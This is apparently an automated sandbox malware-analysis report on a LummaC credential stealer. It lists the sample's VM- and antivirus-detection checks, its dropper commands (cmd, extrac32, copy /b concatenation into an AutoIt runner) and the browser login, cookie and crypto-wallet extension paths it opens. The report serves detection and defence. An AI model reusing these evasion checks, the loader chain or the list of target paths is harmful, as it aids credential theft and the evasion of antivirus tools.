      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.com TID: 6004Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\755831\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\755831Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: Amcache.hve.13.drBinary or memory string: VMware
      Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.13.drBinary or memory string: vmci.sys
      Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.13.drBinary or memory string: VMware20,1
      Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 755831Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DelhiJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "jerusalem" Bangladesh Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 755831\Dl.com + Warriors + Spas + Douglas + Sport + Msg + Garmin + Frederick + Barbados + Sv 755831\Dl.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fw + ..\Brighton + ..\Earliest + ..\Heritage + ..\Claim + ..\Vg + ..\Hardcover + ..\Appropriate gJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\755831\Dl.com Dl.com gJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Dl.com, 0000000D.00000000.2210689155.0000000000C33000.00000002.00000001.01000000.00000007.sdmp, Frederick.9.dr, Dl.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
      Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
